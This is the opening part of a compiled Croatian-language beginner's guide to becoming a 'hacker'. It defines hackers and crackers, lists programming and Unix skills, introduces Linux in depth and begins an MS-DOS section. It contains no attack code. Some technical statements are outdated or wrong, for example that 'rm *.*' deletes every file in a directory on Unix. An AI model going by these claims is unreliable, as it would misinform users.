Uvod

Ovaj priručnik tj. vodič namjenjen je svima onima koje je bar

malo privukao svijet kompjutera, OS-a (operativni sistem)..;
svima onima koji žele malo dublje zaviriti u taj svijet,
istražiti sve njegove tajne i mogućnosti te ih na pravi način
iskoristiti.

Priručnik je podjeljen u dva dijela: u prvom dijelu su

definirane sve osnove, vještine i princip rada hackera, dok su
u drugom dijelu navedeni primjeri (uz detaljan opis) napada
tj. crackerskog upada u sistem.

Moram na početku naglasiti da je ovaj priručnik nastao kao

plod višemjesečnog prikupljanja raznih informacija sa
Interneta (tutorijali, vodiči, skripte, savjeti...) od vrhunskih
stručnjaka i onih koji su već kročili u svijet istraživanja i rada
na kompjuteru.
Dakle, tekstovi nisu moje osobno djelo već prikljupljene
informacije sa raznih strana, objelodanjene u jedno cijelovito
djelo.
Nadam se da će vam bar malo pomoći i uvesti vas u zanimljiv
i koristan svijet hackiranja.

============================
=========

1. DIO

Ko su HACKERI/CRACKERI?
 Od same pojave Interneta i početka surfanja istim u svijetu se
vode velike polemike ko su hackeri i šta u stvari znači taj pojam?
Stručno objašnjenje bi bilo hacker je vrlo inteligentna, često
stručno obrazovana osoba u domeni kompjutera, elitni
programer i poznavatelj rada OS-a (operativnog sistema). Svoje
veliko znanje koristi za pronalazak nedostataka (rupa) u OS ili
nekom programu i nastoji te nedostatke popraviti.

Ljudi od početka brkaju pojam hackera u suštini opisujući

crackere. Cracker je po znanju vrlo sličan hackeru (nestručno
obrazovan tj. samouk), ali on to svoje znanje koristi u obrnuto-
proporcionalne svrhe od hackera (neovlašteno tj. ilegalno upada
u kompjuterske sisteme i OS sa namjerom da iste uništi,
poremeti, ubaci virus.. ili ih jednostavno nakon prisvajanja koristi
za svoje dalje ilegalne radnje).
Cracker, kao i hacker ima veliko znanje o kompjuterima, ali u većini
slučajeva to znanje je stekao (pokupio) od hackera iz njihovih skrpiti i
vodiča.

Baš zbog tih poveznica između ove dvije grupe (veliko

kompjutersko znanje i lagani upad u sisteme) ljudi brkaju pojam
prilikom opisa hackera.
Dakle osnovna razlika između ovih dviju grupa je: hacker pravi i
popravlja stvari, a cracker ih uništava ili prisvaja za sebe.
U svijetu kompjutera ove dvije grupe su često imenovane kao
White hat (bijeli šešir), što bi predstavljalo hackera tj. nešto dobro
ili pozitivno; i Black hat (crni šešir), što bi predstavljalo crackera
tj. nešto loše.
U daljem tekstu ja ću većinom koristiti izraz hacker, mada se u
većini slučajeva prilikom opisa radnji to može odnositi i na
crackere.

Kako postati HACKER!

Sad znate tko su zaista hakeri, zainteresiralo vas je i odlučili ste

postati hacker/cracker. Pogledali ste film "Hakeri" i sad ste
upalili kompjuter. Jedva čekate da odete na Internet, odete na
CIA-inu ili FBI-evu stranicu i provalite u sustav. Cool, glasna
techno glazba i database puna onih šarenih zgrada i elektrona
koji putuju. Međutim, ako želite postati hacker zaboravite sve
filmove. Nema šarenih zgrada i glasne techno glazbe. To su
filmski efekti. Pravi hackeri rade u srži operativnog sustava.
Ako radite na Windowsu, otvorite: START->Run->(upišite CMD,
stisnite ENTER).
Stigli smo! Ovdje se sve odvija. Ovo je DOS-ov Command
prompt (komandna tabla). O DOS-u ću malo kasnije. Ovo je bilo
samo radi demonstracije.

Svijet hackera hijerarski je podjeljen u pet skupina:

-scripty kiddy (najniži stupanj u hackerskom svijetu, uglavnom

koriste razne skripte za učenje – otuda im i naziv, ne znaju
skoro ništa o programiranju, uglavnom se koriste trojancima i
misle da su veliki hackeri, puno njih ne napreduje, a većina ih
na kraju odustane)

- lammeri (viši stupanj scripty kiddyja, naučili su dosta, ali još

uvijek nedovoljno, bolje poznaju Internet, nešto malo su naučili
o programiranju i programskim jezicima, ali ako se petljaju u
ilegalna posla uvijek su uhvaćeni)

-cracker (ovo je već cijenjeniji stupanj, naučili su programirati i

koristiti exploite, često ih ne uhvate)

-cyber (vrlo cijenjeni stupanj u hackerskom svijetu, znaju skoro

sve o Internetu i upadima u sisteme)

-hackeri (super genijalci i prava elita, sve imaju u malom prstu,

nema toga što ne mogu napraviti u kompjuterskom smislu)

Izraz 'hacker' označava osobu koja uči jer voli učiti o

računalima. U mojem riječniku, 'hacker' znači isto što i 'majstor
od zanata'. Majstor nekog zanata radi svoj zanat tako dugo dok
ga ne dovede do savršenstva.
U smislu hackera, to je osoba koja uči o nekom području
računalne znanosti tako dugo dok to područje ne dovede do
savršenstva. Dakle, da je u teoriji i praksi u tome postigao svoj
maksimum. Hakiranje se odnosi na aktivnost postizanja tog
savršenstva.

Izraz 'hacker' se često veže uz računalnu sigurnost, no to ne

mora biti. Može se vezati uz bilo koje polje računalne znanosti -
grafika, programiranje, poslovna informatika, administriranje,
itd.
Svaki hacker spoznaje nove tehnike i vještine na svojem polju
djelovanja (npr. sigurnost). Te vještine prenosi na osobe koje
su manje iskusne ili početnike (npr. napiše tekst o tome što je
novo spoznao, a da to drugi u njegovom polju djelovanja ne
znaju). To ga čini onim što jest - hackerom (npr. 'majstor
računalne sigurnosti').
Od stečenog znanja, osoba mora imati i neke koristi - inače to
znanje ne služi ničemu. Ako se uči samo zato da se voli učiti, a
nema ama baš nikakve koristi od stečenog znanja, onda se
vrijeme i trud troše na krivo! Stoga, ako se uči bez veze, bez
određene i jasne svrhe, osoba ne može biti majstor niti hacker.

Primjerice:
- Tim Backstone uči o računalnoj grafici. Svaki dan spoznaje
nove vještine crtanja raznih oblika. On uči zato jer očekuje da
će svojim znanjem imati financijsku korist.
- Gerald Winston je već zaposlen kao Windoows programer. On
uči o UNIX sigurnosti u svoje slobodno vrijeme. Svrha njegovog
učenja je da povisi reputaciju, tj. da njegov doprinos bude
zabilježen u javnosti i da njegovo ime bude poznato šire nego
već jest, a to će učiniti pišući tekstove i savjetujući korisnike
UNIXa.
- Mario Jurić je srednjoškolac. Polazi matematičku gimnaziju.
Njega fasciniraju kriptografski sustavi pa ih vjerno proučava.
Posjećuje forume i dopisuje se s ljudima koji se bave
kriptografskim sustavima. On to radi jer se nada da će tako
dobiti posao u budućnosti.
- Nenad Marić je također srednjoškolac. Polazi u opću
gimnaziju. Njega zanima računalna sigurnost i hackeri. On želi
postati hackerom jer želi haknuti mnogo servera i postati
slavan među hackerima.
Svi primjeri su izmišljeni, no, očito je da Nenad čini nešto krivo.
On od 'hakiranja' servera neće imati nikakvu korist, a kamo li
slavu. Bit će oštećen višestruko:
- financijski (mrežna oprema, mnogo potrošenih impulsa...)
- emocionalno (agresivnost i sebičnost će ojačati)
- socijalno (društvo će ga zanemariti, izgubit će dosadašnje
prijatelje, a nove će teško steći)
- 'reputacijski' tražit će ga MUP, FBI, Interpol... a to ovisi o
aktivnostima (koje bi vjerovatno bile ilegalne).

Stoga, dragi moji scripty kiddyji, lameri, newbaji i svi koji želite
postati hackerima, čitajte pažljivo. Ako želite biti hackerom (na
području računalne sigurnosti -
najčešće), činite ovako:
1. budite sigurni da to želite
2. vjerujte da to možete
3. očekujte korist od svoje aktivnosti i rada (financijska,
socijalna - novi prijatelji, reputacija - da postanete poznatiji,
kao primjer
drugima ili slično, ...)
4. nadajte se da će se ono što očekujete ispuniti
5. ustrajte u toj aktivnosti i ne odustajte odmah na prvoj
prepreci i nekom složenijem principu rada.
 Treba dosta vremena i truda da se postane hacker, odnosno
'majstor'.
Sav materijal koji vam je potreban da postanete hacker pojasnit
ću u idućem poglavlju. Uz to možete potražiti savjet i na raznim
internetskim forumima od ljudi koji o tome više znaju. Možete
pitati i starije hackere. Primjerice: Želio bih naučiti što je više
moguće o tome pa pitam vas koji znate više od mene.
Ne bojte se reći da ste novi, da ne znate. Ako priznate da ne
znate,
uvijek će vam netko pomoći ako želite da vam se pomogne.
Kineska poslovica kaže:
"Kad je učenik spreman, pojavi se učitelj."

Također, morate znati još nešto važno, a to je razlika između

inteligencije i pameti. Inteligencija je onaj dio vaše osobe koji
omogućuje bolje, brže pamćenje informacija. Taj dio vam
omogućuje da skupite mnogo podataka o području o kojem
želite učiti. Inteligencija je ono što vam je urođeno, što ste
genetski nasljedili. Pamet (emocionalna inteligencija) se stječe
od rođenja, a na razvoj pameti utječe okolina (knjige, roditelji,
prijatelji, baka, vrijeme, tuča, plač, svađe, smijeh, seks...).
Pamet čovjek može mijenjati, budući da na nju utječe okolina, a
to čini tako da
mijenja okolinu, npr. ako je dosad bio izložen lošem utjecaju
društva i
sam je bio alkoholičar, on odlučuje prestati uzimati alkohol,
mijenja
prijatelje, posao, stan i sl. samo da bi promijenio (unaprijedio)
svoju pamet. Dakle,
pamet se odnosi na 'spozaju svojih osjećaja' (zato se zove
*emocionalna* inteligencija).

*** Zašto je to važno u postajanju hackerom? ***

Vi morate imati oboje da bi postali hackerom. Morate imati

intelekt da bi upili potrebno znanje i morate imati pamet da bi
znali da to želite, možete, da ste spremni preuzeti odgovornosti
koje aktivnost kojom se želite baviti donosi, itd. Ovo sam
spomenuo jer mnogi vide ZERO_COOLa ili NEA s Matrixa i
požele biti 'hax0r'. Ne-ne! Prvo, pamet u glavu, a onda da vidite
da li ste spremni na ono što vam ta aktivnost koju ste izabrali
donosi. Na snove, zamišljanja o rušenju servera, slavi koju ćete
dobiti, filmove, MTV spotove, i sl. nemojte se oslanjati. Posao je
napor i zato je veoma važno da birate ono za što ste sposobni.
U svakom poslu ima padova i uspona. Shvatite svaki pad kao
korak bliže uspjehu/rješenju. Problemi su izazovi, a poslom se
izazovi
prihvaćaju. Koliko želite prihvatiti izazov i raditi? Koliko
možete? Da
li ste uopće sposobni za to? Razmislite još jednom. Vi birate!
"Znanje je poput kamena. Kamenom se mogu napraviti velike
stvari ako ga dobro *upotrijebite*."

Osnovne hackerske vještine

Da bi postao dobar i pravi hacker moraš savladati četiri hackerske

vještine.

1. Nauči kako programirati

2. Nabavi jedan od open source Unix-a i nauči kako se upotrebljava
3. Nauči kako da koristiš World Wide Web i pišeš HTML
4. Ako ne znaš funkcionalni Engleski, nauči ga

1. Nauči kako se programira

Ovo je, naravno, osnovna hackerska vještina. Ako ne znaš

nijedan programski jezik predlažem Python za početak. Čistog
je dizajna, dobro dokumentiran i relativno pogodan za
početnike. Usprkos što će vam biti prvi jezik, to ne znači da je
igračka, to je veoma moćan i fleksibilan programski jezik kojim
se mogu razvijati i veliki projekti.

Java je također dobar jezik za početnike. Kompliciraniji je od

Pythona, ali je source pisan u njoj brži. Mislim da je odličan
drugi jezik poslije Pythona. Problem mogu biti biblioteke klasa
koje idu uz jezik, ali ako se odlučiš za Javu uradi to sa nekom
od javno dostupnih implementacija koje će ti olakšati stvar.

Uzmi u obzir da nećeš dostići nivo vještine potrebne za hackera

ili čak programera ako poznaješ samo jedan ili dva jezika.
Moraš naučiti kako razmišljati o problemima programiranja na
specifičan način, bez obzira o kojem se programskom jeziku
radi. Da bi bio pravi hacker, moraš sebe dovesti u situaciju da
naučiš pisanje u novom jeziku u što kraćem vremenu. To znači
da bi trebao naučiti nekoliko veoma različitih programskih
jezika.

Ako se hoćeš ozbiljno baviti programiranjem morat ćeš naučiti

C, osnovni Unix jezik. Postoji i njegov sličan ’’rođak’’ po source
kodu C++. C je veoma efikasan i štedi resurse računala, ali
prilikom toga stvara puno bagova. Potrošit ćete puno vremena
za debugiranje, što je s obzirom na današnja računala loš potez.
 Zato je pametnije koristiti jezik koji troši nešto slabije resurse
računala, nego trošiti vrijeme na debugiranje. Prema tome
Python.

Drugi jezici koji su bitni za hackere su Perl i LiSP. Perl je

vrijedan učenja iz praktičnog razloga; mnogo je upotrebljavan
za aktivne web stranice i admnistraciju sistema, tako da iako
nikad ne budete pisali u Perlu trebali bi ga barem naučiti čitati.
Svaki pravi hacker poznaje barem pet, šest programskih jezika,
zato bi bilo najbolje da naučite već spomenute. Za početnike će
biti dovoljno da nauče Python, Javu, C/C++ i Perl.

Naučiti programirati je kompleksna vještina, ali uz dosta truda,

volje i motiva neće predstavljati veliki problem. Postoji dosta
skripti i tutorijala za svaki pomenuti jezik. Još jednu bitnu stvar
moram napomenuti ovdje – nemojte učiti samo kroz teoriju,
pravi programer svoje znanje usavršava i uz praksu. Učiti
programiranje je kao učenje pisanja prirodnim jezikom. Napište
nešto sami, čitajte još, pišite još više... i ponavljajte to dok ne
razvijete vrstu moći i ekonomičnosti koju možete sami uočiti u
svojim modelima.

2. Nabavi jedan od Unix-a i nauči kako se koristi

Prvi i najvažniji korak za svakog početnika, ako želi da stekne

vještine hackera je da nabavi kopiju Linux-a ili OpenSolaris
(operativni sistemi iz Unix-ove korporacije), instalira ih na svoje
računalo i pokrene. Da, postoje drugi operativni sistemi u svijetu
osim Unix-a, ali oni se distribuiraju ’’in binary’’ – ne može se
čitati source kod i ne može se mijenjati. Naučiti kako se hackira
na nekom računalu na kojem je instaliran Microsoft Windows ili
unutar nekog drugog zatvorenog sistema je kao da učite plesanje
dok nosite oklop.

Unutar Mac OS X-a je moguće, ali samo u jednom dijelu source

koda – navjerovatnije ćete naletjeti na mnogo problema. Unix je
operativni sistem Interneta još od njegovog nastanka. Iako
možeš naučiti o Internetu i bez Unix-a ne možeš biti hacker bez
njega. Iz ovog razloga hackerska kultura se uglavnom vrti oko
Unix-a.
Dakle, nabavi Unix (ja preporučam OS Linux), nauči ga, koristi
ga, čitaj source kod, mijenjaj kod. Dobit ćeš bolje programske
alate nego što ijedan Microsoft OS može sanjati, zabavit ćeš se i
pokupiti mnogo više znanja nego što misliš da si ikad mogao,
kada se poslije izvjesnog vremena osvrneš unazad kao master
hacker.

3. Nauči kako se koristi World Wide Web i piše HTML

 Web je velika i moćna stvar za koju su čak i političari rekli da je
promjenila svijet. Pun je raznoraznih korisnih i manje korisnih
informacija iz svih područja djelovanja. Samo na osnovu ovog
razloga (a i mnogih drugih) moraš naučiti kako se web zapravo
koristi.

Ovo ne znači da samo znaš kako se pokreće browser (svako to

može) već nauči kako se piše HTML, jezik za razvoj weba. Ako ne
znaš programiranje, pisanje HTML-a će ti pomoći da stekneš neke
navike koje će ti kasnije opet pomoći u programiranju i učenju.
Dakle, napravi svoj sajt. Pokušaj koristiti XHTML, koji je čistiji
jezik nego klasični HTML. Za njega također postoji dosta dobrih
tutorijala za početnike na Internetu.

Samo posjedovanje sajta nije ni približno dovoljno da te učini

hackerom. Web je pun osobnih sajtova. Većina njih je besmislena,
nula od sadržaja – koja naoko dobro izgleda, ali ipak besmislena.
Da bi bio vrijedan tvoj sajt mora imati sadržaj i dobar dizajn –
mora biti zanimljiv za čitanje i koristan onima kojima je
namjenjen.

4. Ako ne znaš funkcionalni Engleski, nauči ga

Jedna od bitnih činjenica je ta da je engleski radni jezik među

hackerima i na Internetu i da ga je neophodno znati da bi se
moglo učestvovati u hackerskoj zajednici. Mnogi hackeri kojima je
engleski sekundarni jezik koriste ga u tehničkim diskusijama, čak i
kada im je neki drugi jezik zajednički.
S vremenom ćete shvatiti da engleski ima bogatiji tehnički riječnik
i da je zbog toga jednostavno bolji alat za posao.
Iz sličnih razloga, prijevodi tehničkih knjiga napisanih u
engleskom su često loše prevedeni na druge jezike (čak i kada se
prevedu tako da to na nešto liči).

Osnove Unix-ovog Linux OS-a

Linux? Šta je to? Treba li to ikome? Čemu sluzi? Valja li to? Radi li
to pod Windowsima? I jos tisuću pitanja o Linuxu. Šta je, zaista
Linux? Treba li vam? Možete li bez njega?
Već nekoliko godina koplja se lome oko Linuxa. Suprotstavljene su
dvije struje - jedna je velika grupa vjernih korisnika Microsoftovih
proizvoda koja Linux smatra promašajem, a druga je mala grupa
zadovoljnih korisnika Linuxa. Najčešće stvari koje se Linuxu
zamjeraju je "nekompaktibilnost s Windowsima" i nedostatak
 programske podrške. Obje su tvrdnje netočne. Prva je, zapravo,
poluistinita - Windowsi ne mogu vrtiti niti jedan program pisan
pod Linuxom, ali Linux može vrtiti neke programe pisane pod
Windowsima. Druga tvrdnja je tvrdnja o nedostatku programske
podrške. Iako je dostupno na stotine megabajta programa koje je
Linux ili naslijedio ili su to potpuno novi programi, nepostojanje
MS Office paketa za Linux obično nepoznavatelje i kvazistručnjake
asocira na siromaštvo.
No, ostavimo igranje advokata za neku drugu priliku, u ovom
umetku imat ćete prilike upoznati Linux iznutra, što on stvarno
jest i o čemu se uopćeradi.
Prije nego nastavite pročitajte umetak do kraja da biste dobili
dojam o čemu se priča i o kakvoj se instalaciji uopće radi. Tek
onda možete kroz upute za instalaciju ići korak po korak.

Linux je operativni sustav. Operativni sustav (OS) je najniža

softverska stepenica u vašem računalu. OS je ono pod čim vaši
programi rade i ono što se brine o svim potrebama programa.
Linux je po svojim svojstvima najsličniji Windows NT operativnom
sustavu - kao i NT, Linux ne vuče za sobom nikakvo staro naslijeđe
(poput DOS-a), i kao i NT, Linux je u potpunosti 32-bitni OS (za
razliku od DOS-a i Windowsa 95 koji imaju i 16-bitnog naslijeđa).
No, za razliku od Microsoftovih produkata koji svi imaju neke
zajedničke spone i zajednički vizualni identitet, Linux je jedan od
operativnih sustava izraslih oko
dosta stare UNIX arhitekture.

Jedna od karakteristika tih operativnih sustava na koje obično nisu

navikli oni koji rade pod Microsoftovim operativnim sustavima je
striktno razlikovanje velikih i malih slova. Imate li dvije datoteke
na disku, jedna se zove "Pismo", a druga "pismo" - te dvije
datoteke će biti prihvaćene kao različite, jer se razlikuju u
početnom slovu. Jedno je veliko a drugo malo. Tako i naredbe - sve
se naredbe pišu malim slovima. Dogodi li vam se da slučajno
napišete naredbu velikim slovima Linux je neće prepoznati. Možda
će vas u početku dovoditi u nedoumicu, no malo samodiscipline će
vas naučiti da pišete naredbe malim slovima i da tako
komunicirate s računalom. Iako je Linux vrlo liberalan glede
znakova koje smijete upotrebljavati za nazive datoteka,
izbjegavajte upotrebu naših slova.

Je li Linux onda samo jedan od UNIX-a? Linux ipak nije Unix. Da bi

jedan OS imao pravo nazivati se Unixom mora zadovoljiti određene
uvjete, a Linux zasad zadovoljava samo par njih, no i to je
dovoljno da ga se smatra članom Unix zajednice. Linux je, dakle,
samostalan, besplatan OS. To prije svega znači da za korištenje
Linuxa nikom ne trebate platiti, to je potpuno besplatan OS. Zatim,
samom činjenicom da je riječ o operativnom sustavu a ne
"običnom" programu, Linux nije moguće pogoniti iz DOS-a ili
Windows-a, jer je Linux u stvari zamjena za DOS i Windows-e. Oni
mogu koegzistirati na disku, ali ne mogu u isto vrijeme imati vlast
nad računalom tj. na računalu možete raditi ili pod Windowsima ili
pod Linuxom, nikad istovremeno. Istina postoje za Linux emulatori
koji omogućuju startanje DOS ili Windows programa, ali se oni i
dalje izvršavaju pod Linuxom kao OS-om.

Linux može biti smješten na istom disku na kojem je već instaliran

DOS ili Windows, ali može biti i u zasebnoj particiji. Svaki od ta
dva načina instaliranja ima svoje prednosti i mane. U prvom
slučaju, kad Linux instalirate na već formatizirani disk s FAT
tablicom nećete morati fdiskom mijenjati disk, praviti nove
particije i slično. No, neće se sve distribucije dati instalirati na FAT
particiju. U drugom slučaju, kad Linux instalirate na njegovu
vlastitu particiju, podaci s te particije dostupni su samo Linuxom,
ne i DOS-om (osim uz pomoć posebnih programa). No dobit je
višestruka: na svojoj osobnoj particiji Linux se ponaša udobnije,
sigurnije i višestruko je brži nego na FAT particiji. Uglavnom,
jednom instaliran Linux moći ćete podići ili prilikom paljenja
računala, kad će vas poseban program koji Linux instalira pitati
želite li podići Linux ili neki drugi OS (DOS, Windows). Ako iz
nekog razloga ne instalirate taj program, moći ćete iz DOS-a malim
programčićem ugasiti OS na kojem trenutno radite i podići Linux.

Jednom podignut Linux javit će se pozdravnom porukom i

promptom "Login:". Obično u tekstualnom modu, ali želite li tako,
Linux odmah po podizanju može prijeći u svoje grafičko okružje
(XWindows, skraćeno X). Ovaj OS možete po vlastitoj želji koristiti
u tekstualnom i u grafičkom modu, pri čemu se osnovna
funkcionalnost operativnog sustava ne razlikuje previše ovisno o
tome radite li u grafičkom ili tekstualnom načinu rada. Kako je
Linux višekorisnički OS, pri svakom započinjanju posla potrebno se
predstaviti računalu, reći "ja sam taj i taj", da bi računalo znalo s
kojim korisnikom ima posla i da bi mu učinilo dostupnim njegove
podatke, a nedostupnim tuđe podatke.
Ne, ne morate biti shizofrenik da biste koristili multikorisničke
mogućnosti Linuxa. Linux jednako radi i sa samo jednim
korisnikom na stroju kao i kad ih ima desetak i svi istovremeno
rade. To mu omogućuje ugrađeni multitasking.

Višekorisnički stroj je svaki stroj koji dozvoljava rad više korisnika

na istom stroju. Za razliku od MS DOS-a i starih Windows-a koji su
pretpostavljali da je vlasnik računala istovremeno i jedini korisnik,
Windows NT, Linux i mnogi drugi OS-ovi pretpostavljaju da vlasnik
računala nije jedini korisnik stroja, već da stroj mogu koristiti i
druge osobe.
Pri tome nije bitno da li oni računalu pristupaju istovremeno ili
jedan po jedan. Isto tako, nije važno pristupaju li računalu s
udaljenog terminala ili direktno na računalu (u tom slučaju
govorimo o "konzoli").

Jedna od karakteristika višekorisničkog stroja je zaštita podataka.

Zamislimo primjerice da ste na vaše računalo instalirali Linux. I vi
u njemu radite, ali upada vam u sobu brat/sestra/muž/žena i kaže
da mu/joj treba računalo za obaviti neke poslove. Pristanete li, vaš
jednokorisnički Linux tad počinje pokazivati svoje višekorisničke
prednosti: dajte Linuxu do znanja da će još jedna osoba koristiti
računalo (stručno bi se to reklo napravite novi account na
računalu), a Linux će sam brinuti o tome da ta
osoba ima sve potrebno za rad, ali će pri tome paziti i da ta osoba,
primjerice, ne može pristupati vašim podacima već samo onima
koje joj dozvolite. Isto tako, podaci te osobe bit će zaštićeni od
vašeg pogleda (ili pogleda neke treće osobe). Uzajamno si isto
tako nećete moći mijenjati ili brisati podatke. Dodatno, ta druga
osoba uopće ne mora
sjediti za vašim računalom - ona se može modemom, mrežnom
karticom ili na
neki treći način povezati s vašim računalom i s nekog drugog
mjesta (druge sobe, druge zgrade ili drugog kraja svijeta) raditi
kao da sjedi u vašoj sobi za vašim računalom. Ideja
višekorisničkog stroja je, dakle, napraviti takvu okolinu u kojoj će
svatko, bez obzira gdje se nalazi i da li za vašim računalom netko
već radi, moći pristupiti računalu i raditi kao da sjedi za njim. Pri
tome će imati jedan dio diskovnog prostora samo za sebe, koji će
biti zaštićen od nepoželjnih, ali će moći bez ikakvih ograničenja
dijeliti željene datoteke
s drugim osobama.

Multitasking je sposobnost operativnog sustava (ne računala nego

baš operativnog sustava) da izvršava više programa odjednom.
Iako ulazeći dublje u analizu multitaskinga neizbježno dodirujemo
područje multiprocesorskih računala, za ugodan multitasking
dovoljno nam je i računalo s jednim procesorom.
Multitasking, dakle, ne ovisi o računalu niti o procesoru, već o
operativnom sustavu koji koristite. Tako primjerice Amiga i
Macintosh računala imaju OS od samog početka rađen s idejom
multitaskinga, dok PC računala imaju vrlo šarenu ponudu
operativnih sustava s nekoliko različitih mogućnosti multitaskinga.

Moć multitaskinga najbolje ćete osjetiti radite li imalo zahtjevnije

poslove za računalom. Trebate li računalo samo da biste na njemu
izvršavali jedan program (Word, bazu podataka, program za
crtanje..) onda vam multitasking i nije pretjerano koristan (iako je
zgodno odigrati Solitaire dok baza traga za podacima). No, trebate
li istovremeno
pokrenuti nekoliko programa, multitasking je jedino rješenje.
Primjerice, osoba iz prethodnog poglavlja baš mora taj čas
napisati neki dokument dok vi radite ozbiljne stvari na računalu
(Doom i slično). Veže li se preko terminala moći će bez problema
uraditi svoj posao dok se vi zabavljate. Pri tome nećete zasmetati
jedno drugome, niti ćete imati potrebe razmiąljati da li još tko
osim vas radi na računalu - Linux sam brine o
opsluživanju oba korisnika.

Linux je dosta skroman po izboru hardwarea na kojem želi raditi.

Zavrtjeti ga možete i na 386SX računalu s 4MB memorije i
Hercules video karticom. Iako je to takoreći zastario procesor, na
njemu Linux radi jednako kao i na 486 ili Pentium procesoru -
razlika je jedino u brzini izvršavanja programa. Nekakav logičan
minimum bilo bi 486 računalo s 8MB memorije, na kojem se Linux
dosta življe ponaša, i to je najmanja konfiguracija u kojoj možete
relativno ugodno raditi u XWindows sučelju (Linuxovo grafičko
sučelje,
zapravo uobičajeno grafičko sučelje Unixa). Već s 16MB memorije
Linux se osjeća komotno, a s jačim procesorom i više memorije
možete samo profitirati. Linux ne pati toliko na procesor koliko na
memoriju, pa ćete dodavanjem više memorije bolje profitirati nego
stavljanjem novog procesora. Osobito imate li manje od 8MB
memorije u računalu.

Diskovni prostor je gotovo jednako štedljiv. Neke od Linux

distribucija su gotovo u cijelosti rađene tako da se mogu pokretati
s CD-a, pa je sve što trebate učiniti - staviti CD u čitač i pokrenuti
Linux, koji će za svoje najminimalnije potrebe (ne više od nekoliko
megabajta prostora) koristiti DOS particiju, a najveći dio Linuxa
bit će učitavan s CD-a.
Najmanja "normalna" instalacija Linuxa na disk bila bi oko
dvadesetak MB. Unutar tih 20-tak MB možete smjestiti sve
najosnovnije stvari, uključujući tu i C prevodilac. Možete instalirati
i neku iz serije "MiniLinux" distribucija, koje zauzimaju čak i
manje prostora.
Dakako da s tako "osakaćenim" Linuxom nećete imati sve
prednosti koje vam pruža kompletnija distribucija, koja bi zauzela
od 50 do 500MB prostora na disku, ovisno o željama i potrebama.
Nekakva srednja vrijednost bila bi 100-150MB prostora za ugodan
rad s pažljivo biranim alatima.

Grafička kartica može biti bilo koja VGA kartica, čak i CGA, EGA ili
Hercules. Imate li negdje u prašnjavom podrumu Hercules karticu i
monitor možete i nju staviti u računalo, a Linux će ju moći
iskoristiti. Pristup vašeg Linux računala svijetu ostvarivat ćete
obično jedan od ova dva načina: Ethernet karticom ili modemom.
Zato je neophodno imati jedno
od to dvoje. S Ethernet karticama nema problema, podržano je sve
na što u normalnim uvjetima možete naići. Modem isto tako može
biti bilo koji, vanjski ili ugradivi. Poželjno je, uglavnom zbog
problema pri instalaciji, imati ATAPI CD-ROM. Razlika između
ATAPI i ostalih pogona je što se ATAPI pogoni vežu na HDD
kontroler, kao disk. Ostali se obično vežu na neku karticu u
računalu. Nemate li ATAPI CD-ROM, nemojte očajavati, Linux će
vjerojatno prepoznati i vaš. Ako ga ne prepozna, morat ćete mu
ručno objašnjavati koji pogon imate u računalu.

Zvučne kartice znaju praviti probleme s Linuxom. U principu je to

samo pitanje rasprostranjenosti zvučne kartice. Za Linux ćete vrlo
rijetko naći upravljačke programe (drivere, u slučaju Linuxa
module) za zvučnu karticu koje je radio proizvođač te kartice; u
najvećem broju slučajeva podršku rade sami korisnici kartice. To
 nipošto ne znači da su takvi programi manje kvalitetni ili manje
pouzdani - često su manji, bolji i brži od onih koje za istu tu
karticu ali drugi OS isporučuje proizvođač. Ako je vaša zvučna
kartica rijetka, vjerojatno nećete lako naći podršku za nju, ali ako
je imalo poznatija - podršku ćete sigurno imati. "Kompaktibilne"
kartice često zbog svoje nesavršene kompaktibilnosti imaju
problema s podrškom za karticu koju emuliraju, ali i za njih
postoje neka generička
rješenja. U biti, dosta mali broj zvučnih kartica nabavljivih u
trgovinama nema podršku u Linuxu.

Za razliku od DOSa ili Windowsa, Linux nije ograničen na jednu

jedinu distribuciju. Sjetimo se, Linux je besplatan operativni
sustav koji možete cjelokupnog dobiti u source-u. No, distribucije
se (i) plaćaju. Zašto je tako? Postoji više različitih distribucija,
koje svaka u osnovi imaju besplatan Linux, a neke osim njega
imaju i posebno pisane programe. Kupujući distribuciju, ne plaćate
Linux, već plaćate trud autora
distribucije da skupe programe i slože ih na CD, a u nekim
slučajevima plaćate i posebne programe koji dolaze uz distribuciju
a koji nisu besplatni. Bitne razlike u distribucijama nema, niti su
one međusobno "nekompaktibilne". Riječ je o jednom te istom
Linuxu koji je isporučen s više ili manje dodatnih programa, ili s
nekim posebnim dodacima, ovisno o
distribuciji. Dakle, ne možete pogriješiti odlučite li se za ovu ili onu
distribuciju, uvijek ćete na kraju dobiti isti rezultat - Linux. Za koju
se distribuciju odlučiti? Želite li besplatnu distribuciju, možete je
skinuti s Interneta (ili instalirati Slackware s PC Chipovog CD-a), a
komercijalne trebate naručiti. Tri najpoznatije i najomiljenije
distribucije su Slackware, RedHat i Debian. Sve tri nabavljive su
preko Interneta i ne trebate plaćati za
njih. Ako ste početnik, nemojte odmah skakati na komercijalnu
distribuciju - instalirajte za početak neku besplatnu, iživljavajte se
na njoj dok ne naučite malo više o Linuxu i kad barem malo uđete
u bit tog OS-a bit će vam puno lakše odabrati komercijalnu
distribuciju.
Sve konfiguracije moguće je instalirati s CDa, a instaliranje s
diskete podržavaju Debian, Linuxware, RedHat, Slackware i WGS
Linux Pro.
Programi za administriranje sustava mogu biti ili tekstualni
(OpenLinux, Craftworks, Linuxware, S.u.S.E., Slackware) ili
grafički (OpenLinux, Debian, RedHat, WGS..). Razlike u
funkcionalnosti nema, ali su grafički programi pregledniji i
intuitivniji.

Na kraju ovog poglavlja donosim neke osnovne Unix komande koje

vrijede za sve OS pod Unixom. Da biste vidjeli u kojem se
direktoriju nalazite utipkajte ovu komandu: pwd .
Da biste vidjeli koje fileove imate u direktoriju utipkajte ovo: ls -al
(ovim ćete vidjeti i
privilegije).
Da biste se mogli kretati kroz direktorije koristite ove komande: cd
 direktorijum (ovim odlazite u željeni direktorij) ,cd .. (izlazite iz
direktorija).
Da biste obrisali neki file koristite ovu komandu:
rm file. Ako hoćete obrisati sve u direktoriju utipkajte ovo: rm *.*

Komande i programi u MS-DOS

MS-DOS kao i drugi operativni sistemi, upravlja tokom informacija

između različitih djelova vašeg računalnog sistema. Sa MS-DOS-
om radite tipkajući ili izabirući komande koje usmjeravaju sistem
da izvrši postavljene zadatke. MS-DOS obuhvaća komande koje
možete koristiti za izvršavanje slijedećih zadataka:
-upravljanje datotekama i direktorijima
- održavanje diskova
- konfiguriranje hardvera
- optimizacija korištenja memorije
- prilagođavanje MS-DOS-a

Postoje dva načina na koja možete raditi sa MS-DOS – koristeći

MS-DOS Shell (jezgru) ili tipkajući komande u komandnoj liniji.
